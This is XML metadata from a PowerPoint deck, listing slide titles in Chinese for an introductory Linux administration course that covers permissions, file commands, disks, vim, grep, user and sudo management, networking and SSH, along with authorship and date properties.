      <vt:lpstr>大綱</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>何謂作業系統</vt:lpstr>
      <vt:lpstr>何謂作業系統</vt:lpstr>
      <vt:lpstr>LINUX作業系統架構</vt:lpstr>
      <vt:lpstr>Windows作業系統架構</vt:lpstr>
      <vt:lpstr>Linux系統內的shell</vt:lpstr>
      <vt:lpstr>何謂作業系統</vt:lpstr>
      <vt:lpstr>何謂作業系統</vt:lpstr>
      <vt:lpstr>常見的作業系統</vt:lpstr>
      <vt:lpstr>UNIX</vt:lpstr>
      <vt:lpstr>UNIX的特色</vt:lpstr>
      <vt:lpstr>DOS</vt:lpstr>
      <vt:lpstr>Linux/FreeBSD</vt:lpstr>
      <vt:lpstr>Mac OS X/OS X</vt:lpstr>
      <vt:lpstr>嵌入式作業系統</vt:lpstr>
      <vt:lpstr>Windows作業系統介紹</vt:lpstr>
      <vt:lpstr>Program/Process/Thread 差異</vt:lpstr>
      <vt:lpstr>Program/Process/Thread 差異</vt:lpstr>
      <vt:lpstr>Program/Process/Thread 差異</vt:lpstr>
      <vt:lpstr>Program/Process/Thread 差異</vt:lpstr>
      <vt:lpstr>Program/Process/Thread 差異</vt:lpstr>
      <vt:lpstr>Program/Process/Thread 差異</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Linux的優缺點</vt:lpstr>
      <vt:lpstr>關於授權</vt:lpstr>
      <vt:lpstr>硬體裝置在Linux中的檔名</vt:lpstr>
      <vt:lpstr>磁碟分割表(partition table)</vt:lpstr>
      <vt:lpstr>磁碟分割表(partition table)</vt:lpstr>
      <vt:lpstr>磁碟分割表(partition table)</vt:lpstr>
      <vt:lpstr>練習</vt:lpstr>
      <vt:lpstr>開機流程</vt:lpstr>
      <vt:lpstr>用戶登錄</vt:lpstr>
      <vt:lpstr>圖形登錄方式</vt:lpstr>
      <vt:lpstr>Linux系統桌面</vt:lpstr>
      <vt:lpstr>獲得幫助指令</vt:lpstr>
      <vt:lpstr>man page</vt:lpstr>
      <vt:lpstr>慣用的關機指令： shutdown</vt:lpstr>
      <vt:lpstr>實作1</vt:lpstr>
      <vt:lpstr>實作2</vt:lpstr>
      <vt:lpstr>文字介面指令下達</vt:lpstr>
      <vt:lpstr>文字介面指令下達</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>檔案與目錄之權限</vt:lpstr>
      <vt:lpstr>Linux檔案屬性</vt:lpstr>
      <vt:lpstr>檔案種類</vt:lpstr>
      <vt:lpstr>權限介紹</vt:lpstr>
      <vt:lpstr>檔案權限表示</vt:lpstr>
      <vt:lpstr>使用數字法更改權限</vt:lpstr>
      <vt:lpstr>一般權限</vt:lpstr>
      <vt:lpstr>一般權限</vt:lpstr>
      <vt:lpstr>一般權限</vt:lpstr>
      <vt:lpstr>一般權限</vt:lpstr>
      <vt:lpstr>改變檔案/目錄的所屬群組</vt:lpstr>
      <vt:lpstr>改變檔案/目錄的所有權</vt:lpstr>
      <vt:lpstr>改變檔案/目錄的權限</vt:lpstr>
      <vt:lpstr>符號類型改變檔案權限</vt:lpstr>
      <vt:lpstr>符號類型改變檔案權限</vt:lpstr>
      <vt:lpstr>符號類型改變檔案權限</vt:lpstr>
      <vt:lpstr>檔案權限-實作1</vt:lpstr>
      <vt:lpstr>檔案權限-實作2</vt:lpstr>
      <vt:lpstr>  檔案目錄特殊權限  </vt:lpstr>
      <vt:lpstr>  檔案目錄特殊權限  </vt:lpstr>
      <vt:lpstr>  檔案目錄特殊權限  </vt:lpstr>
      <vt:lpstr>檔案目錄特殊權限</vt:lpstr>
      <vt:lpstr>  檔案目錄特殊權限  </vt:lpstr>
      <vt:lpstr>  檔案目錄特殊權限  </vt:lpstr>
      <vt:lpstr>  檔案目錄特殊權限  </vt:lpstr>
      <vt:lpstr>檔案目錄特殊權限</vt:lpstr>
      <vt:lpstr>檔案目錄特殊權限</vt:lpstr>
      <vt:lpstr>  檔案目錄特殊權限  </vt:lpstr>
      <vt:lpstr>檔案目錄特殊權限</vt:lpstr>
      <vt:lpstr>檔案目錄特殊權限</vt:lpstr>
      <vt:lpstr>檔案目錄特殊權限</vt:lpstr>
      <vt:lpstr>實作</vt:lpstr>
      <vt:lpstr>認識系統的目錄樹</vt:lpstr>
      <vt:lpstr>認識系統的目錄</vt:lpstr>
      <vt:lpstr>認識系統的目錄</vt:lpstr>
      <vt:lpstr>認識系統的目錄</vt:lpstr>
      <vt:lpstr>認識系統的目錄</vt:lpstr>
      <vt:lpstr>認識系統的目錄</vt:lpstr>
      <vt:lpstr>認識系統的目錄</vt:lpstr>
      <vt:lpstr>認識系統的目錄</vt:lpstr>
      <vt:lpstr>認識系統的目錄</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>絕對路徑與相對路徑</vt:lpstr>
      <vt:lpstr>絕對路徑與相對路徑</vt:lpstr>
      <vt:lpstr>目錄的相關操作</vt:lpstr>
      <vt:lpstr>目錄操作指令</vt:lpstr>
      <vt:lpstr>cd</vt:lpstr>
      <vt:lpstr>pwd</vt:lpstr>
      <vt:lpstr>mkdir</vt:lpstr>
      <vt:lpstr>rmdir</vt:lpstr>
      <vt:lpstr>實作</vt:lpstr>
      <vt:lpstr>檔案操作指令</vt:lpstr>
      <vt:lpstr>ls</vt:lpstr>
      <vt:lpstr>cp</vt:lpstr>
      <vt:lpstr>rm</vt:lpstr>
      <vt:lpstr>mv</vt:lpstr>
      <vt:lpstr>檔案操作實作練習-1</vt:lpstr>
      <vt:lpstr>檔案操作實作練習-2</vt:lpstr>
      <vt:lpstr>檔案時間的修訂</vt:lpstr>
      <vt:lpstr>實作</vt:lpstr>
      <vt:lpstr>檔案內容查閱</vt:lpstr>
      <vt:lpstr>實作1</vt:lpstr>
      <vt:lpstr>實作2</vt:lpstr>
      <vt:lpstr>連結概念(複製)</vt:lpstr>
      <vt:lpstr>Linux連結介紹</vt:lpstr>
      <vt:lpstr>Linux連結介紹</vt:lpstr>
      <vt:lpstr>硬連結示意圖解釋</vt:lpstr>
      <vt:lpstr>Linux連結介紹</vt:lpstr>
      <vt:lpstr>建立硬連結範例</vt:lpstr>
      <vt:lpstr>建立硬連結範例</vt:lpstr>
      <vt:lpstr>Linux連結介紹</vt:lpstr>
      <vt:lpstr>軟連結示意圖解釋</vt:lpstr>
      <vt:lpstr>建立兩種連結與比較範例</vt:lpstr>
      <vt:lpstr>硬連結與符號連結比較</vt:lpstr>
      <vt:lpstr>硬連結與符號連結比較</vt:lpstr>
      <vt:lpstr>實作1</vt:lpstr>
      <vt:lpstr>實作2</vt:lpstr>
      <vt:lpstr>實作3</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>檔案系統特性</vt:lpstr>
      <vt:lpstr>file :觀察檔案類型的指令</vt:lpstr>
      <vt:lpstr>df :察看硬碟空間使用量的指令</vt:lpstr>
      <vt:lpstr>du：察看目錄內所有檔案使用量</vt:lpstr>
      <vt:lpstr>磁碟分割、格式化、檢驗與掛載</vt:lpstr>
      <vt:lpstr>磁碟分割、格式化、檢驗與掛載</vt:lpstr>
      <vt:lpstr>磁碟分割、格式化、檢驗與掛載</vt:lpstr>
      <vt:lpstr>查看磁碟列表:lsblk </vt:lpstr>
      <vt:lpstr>查看磁碟列表:lsblk </vt:lpstr>
      <vt:lpstr>磁碟分割： fdisk</vt:lpstr>
      <vt:lpstr>磁碟分割： fdisk</vt:lpstr>
      <vt:lpstr>磁碟分割： fdisk</vt:lpstr>
      <vt:lpstr>磁碟格式化</vt:lpstr>
      <vt:lpstr>磁碟格式化</vt:lpstr>
      <vt:lpstr>磁碟掛載與卸載</vt:lpstr>
      <vt:lpstr>掛載Ext2/Ext3檔案系統</vt:lpstr>
      <vt:lpstr>掛載 CD 或 DVD 光碟</vt:lpstr>
      <vt:lpstr>掛載隨身碟</vt:lpstr>
      <vt:lpstr>Root 密碼忘記如何還原</vt:lpstr>
      <vt:lpstr>Root 密碼忘記如何還原</vt:lpstr>
      <vt:lpstr>Root 密碼忘記如何還原</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>簡介</vt:lpstr>
      <vt:lpstr>打包、壓縮副檔名解說</vt:lpstr>
      <vt:lpstr>gzip壓縮</vt:lpstr>
      <vt:lpstr>解壓縮-gunzip</vt:lpstr>
      <vt:lpstr>bzip2壓縮</vt:lpstr>
      <vt:lpstr>bzip2解壓縮</vt:lpstr>
      <vt:lpstr>實作 gzip&amp;gunzip</vt:lpstr>
      <vt:lpstr>實作 bzip&amp;bunzip2</vt:lpstr>
      <vt:lpstr>打包的 tar 指令</vt:lpstr>
      <vt:lpstr>檔案打包-tar</vt:lpstr>
      <vt:lpstr>實作打包、壓縮及解壓縮</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>VIM編輯器簡介</vt:lpstr>
      <vt:lpstr>為何要學 vim</vt:lpstr>
      <vt:lpstr>為何要學 vim</vt:lpstr>
      <vt:lpstr>vi 與 vim 的差異</vt:lpstr>
      <vt:lpstr>功能強大的 vim 文書編輯軟體</vt:lpstr>
      <vt:lpstr>vim的三種模式</vt:lpstr>
      <vt:lpstr>vim 的基本操作</vt:lpstr>
      <vt:lpstr>執行 vim</vt:lpstr>
      <vt:lpstr>用 vim 編寫文件</vt:lpstr>
      <vt:lpstr>用 vim 編寫文件</vt:lpstr>
      <vt:lpstr>用 vim 編寫文件</vt:lpstr>
      <vt:lpstr>進入 vim 後,如何開啟既有文字檔？</vt:lpstr>
      <vt:lpstr>進入 vim 後,如何開啟既有文字檔？</vt:lpstr>
      <vt:lpstr>儲存檔案、離開 vim</vt:lpstr>
      <vt:lpstr>移動</vt:lpstr>
      <vt:lpstr>移動</vt:lpstr>
      <vt:lpstr>移動</vt:lpstr>
      <vt:lpstr>移動</vt:lpstr>
      <vt:lpstr>移動游標的進階操作</vt:lpstr>
      <vt:lpstr>搜尋與取代</vt:lpstr>
      <vt:lpstr>搜尋與取代</vt:lpstr>
      <vt:lpstr>複製</vt:lpstr>
      <vt:lpstr>貼上</vt:lpstr>
      <vt:lpstr>刪除</vt:lpstr>
      <vt:lpstr>刪除</vt:lpstr>
      <vt:lpstr>復原</vt:lpstr>
      <vt:lpstr>存檔</vt:lpstr>
      <vt:lpstr>存檔</vt:lpstr>
      <vt:lpstr>存檔</vt:lpstr>
      <vt:lpstr>區塊選擇</vt:lpstr>
      <vt:lpstr>區塊選擇</vt:lpstr>
      <vt:lpstr>多檔案編輯</vt:lpstr>
      <vt:lpstr>多視窗編輯</vt:lpstr>
      <vt:lpstr>多視窗編輯</vt:lpstr>
      <vt:lpstr>實作1</vt:lpstr>
      <vt:lpstr>實作2</vt:lpstr>
      <vt:lpstr>實作3</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>什麼是正規表示法(grep)</vt:lpstr>
      <vt:lpstr>grep</vt:lpstr>
      <vt:lpstr>grep參數</vt:lpstr>
      <vt:lpstr>grep的正規則表達式</vt:lpstr>
      <vt:lpstr>grep的正規則表達式</vt:lpstr>
      <vt:lpstr>grep的正規則表達式</vt:lpstr>
      <vt:lpstr>實作1</vt:lpstr>
      <vt:lpstr>實作2</vt:lpstr>
      <vt:lpstr>實作3</vt:lpstr>
      <vt:lpstr>管線 (pipe) | 的意義</vt:lpstr>
      <vt:lpstr>管線 (pipe) | 的範例</vt:lpstr>
      <vt:lpstr>指令介面指令下達進階用法</vt:lpstr>
      <vt:lpstr>指令介面指令下達進階用法</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>帳號管理</vt:lpstr>
      <vt:lpstr>帳號管理</vt:lpstr>
      <vt:lpstr>帳號與群組</vt:lpstr>
      <vt:lpstr>用戶群組管理</vt:lpstr>
      <vt:lpstr>用戶帳號管理</vt:lpstr>
      <vt:lpstr>使用者身分切換</vt:lpstr>
      <vt:lpstr>sudo 取得root權限</vt:lpstr>
      <vt:lpstr>以其他使用者的身分執行指令</vt:lpstr>
      <vt:lpstr>sudo執行指令流程</vt:lpstr>
      <vt:lpstr>sudo執行指令流程</vt:lpstr>
      <vt:lpstr>修改使用者執行權限</vt:lpstr>
      <vt:lpstr>visudo 修改sudoers檔案</vt:lpstr>
      <vt:lpstr>使用admin操作sudo指令</vt:lpstr>
      <vt:lpstr>新增使用者</vt:lpstr>
      <vt:lpstr>新增群組</vt:lpstr>
      <vt:lpstr>修改使用者參數</vt:lpstr>
      <vt:lpstr>修改群組參數</vt:lpstr>
      <vt:lpstr>移除使用者</vt:lpstr>
      <vt:lpstr>移除群組</vt:lpstr>
      <vt:lpstr>建立密碼</vt:lpstr>
      <vt:lpstr>群組管理員功能</vt:lpstr>
      <vt:lpstr>群組管理員功能</vt:lpstr>
      <vt:lpstr>實作1</vt:lpstr>
      <vt:lpstr>實作2</vt:lpstr>
      <vt:lpstr>實作3</vt:lpstr>
      <vt:lpstr>帳號管理 RHCSA實作</vt:lpstr>
      <vt:lpstr>檔案及目錄之ACL設定</vt:lpstr>
      <vt:lpstr>檔案及目錄之ACL設定</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>ACL實作範例</vt:lpstr>
      <vt:lpstr>ACL-RHCSA實作範例</vt:lpstr>
      <vt:lpstr>例行性命令</vt:lpstr>
      <vt:lpstr>例行性命令</vt:lpstr>
      <vt:lpstr>例行性命令</vt:lpstr>
      <vt:lpstr>RHCSA例行性命令實作練習</vt:lpstr>
      <vt:lpstr>十、Linux常用網路指令</vt:lpstr>
      <vt:lpstr>ifconfig, ifup, ifdown</vt:lpstr>
      <vt:lpstr>常用指令</vt:lpstr>
      <vt:lpstr>常用指令</vt:lpstr>
      <vt:lpstr>常用指令</vt:lpstr>
      <vt:lpstr>常用指令</vt:lpstr>
      <vt:lpstr>常用指令</vt:lpstr>
      <vt:lpstr>常用指令</vt:lpstr>
      <vt:lpstr>測試DNS</vt:lpstr>
      <vt:lpstr>修改DNS位置與測試DNS</vt:lpstr>
      <vt:lpstr>常用指令</vt:lpstr>
      <vt:lpstr>常用指令</vt:lpstr>
      <vt:lpstr>常用指令</vt:lpstr>
      <vt:lpstr>修改網卡組態資料</vt:lpstr>
      <vt:lpstr>修改網卡組態資料</vt:lpstr>
      <vt:lpstr>實作1</vt:lpstr>
      <vt:lpstr>遠端連線常用指令</vt:lpstr>
      <vt:lpstr>遠端連線常用指令</vt:lpstr>
      <vt:lpstr>產生新的ssh 公鑰與私鑰</vt:lpstr>
      <vt:lpstr>產生新的ssh 公鑰與私鑰</vt:lpstr>
      <vt:lpstr>遠端連線常用指令</vt:lpstr>
      <vt:lpstr>遠端連線常用指令</vt:lpstr>
      <vt:lpstr>遠端連線常用指令</vt:lpstr>
      <vt:lpstr>遠端連線常用指令</vt:lpstr>
      <vt:lpstr>遠端連線常用指令</vt:lpstr>
      <vt:lpstr>遠端連線常用指令</vt:lpstr>
      <vt:lpstr>路由指令</vt:lpstr>
      <vt:lpstr>路由指令</vt:lpstr>
      <vt:lpstr>路由指令</vt:lpstr>
      <vt:lpstr>路由指令</vt:lpstr>
      <vt:lpstr>路由指令</vt:lpstr>
      <vt:lpstr>路由相關指令</vt:lpstr>
      <vt:lpstr>路由相關指令</vt:lpstr>
      <vt:lpstr>下載常用指令</vt:lpstr>
      <vt:lpstr>資安常用指令</vt:lpstr>
      <vt:lpstr>資安常用指令</vt:lpstr>
      <vt:lpstr>資安常用指令</vt:lpstr>
      <vt:lpstr>資安常用指令</vt:lpstr>
      <vt:lpstr>資安常用指令</vt:lpstr>
      <vt:lpstr>資安常用指令</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>CM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Jerry Liang</dc:creator>
  <cp:lastModifiedBy>123</cp:lastModifiedBy>
  <cp:revision>2148</cp:revision>
  <cp:lastPrinted>2020-02-03T01:35:36Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2005-08-11T05:16:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-23T08:25:42Z</dcterms:modified>
</cp:coreProperties>
</file>